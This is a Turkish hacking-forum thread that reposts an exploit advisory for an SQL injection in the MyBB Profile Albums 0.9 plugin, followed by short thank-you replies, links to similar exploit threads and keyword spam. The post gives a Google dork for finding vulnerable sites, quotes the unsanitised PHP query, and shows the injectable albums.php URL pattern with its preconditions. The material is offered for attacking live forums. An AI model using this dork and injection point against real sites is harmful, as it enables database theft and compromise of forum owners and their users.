Konuyu Oyla:
  • Derecelendirme: 3.5/5 - 4 oy
  • 1
  • 2
  • 3
  • 4
  • 5
MyBB Profile Albums 0.9 SQL Injection
#1
# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within albums.php :

PHP Kod:
<?
/*Line 69*/ $aid = $mybb->input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*",
"aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Beğenenler: Symxq
#2
eline sağlık exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#3
Teşekkürler
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  MyBB Forum usercp.php?action=avatar Açığı KingSkrupellos 232 11,999 Dün, Saat: 07:32
Son Yorum: Efetimi
  創意細胞 SQL Injection H4Sec 27 753 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,110 01-03-2016, Saat: 03:59
Son Yorum: Zany
  MyBB 1.8.x Plugin Shell Yükleyicisi Php - Zip KingSkrupellos 4 259 23-01-2016, Saat: 11:10
Son Yorum: The Flash
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 124 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
Anahtar Kelimeler

MyBB Profile Albums 0.9 SQL Injection indir, MyBB Profile Albums 0.9 SQL Injection Videosu, MyBB Profile Albums 0.9 SQL Injection Online izle, MyBB Profile Albums 0.9 SQL Injection Bedava indir, MyBB Profile Albums 0.9 SQL Injection Yükle, MyBB Profile Albums 0.9 SQL Injection Hakkında, MyBB Profile Albums 0.9 SQL Injection Nedir, MyBB Profile Albums 0.9 SQL Injection Free indir, MyBB Profile Albums 0.9 SQL Injection Oyunu, MyBB Profile Albums 0.9 SQL Injection Download


1 Ziyaretçi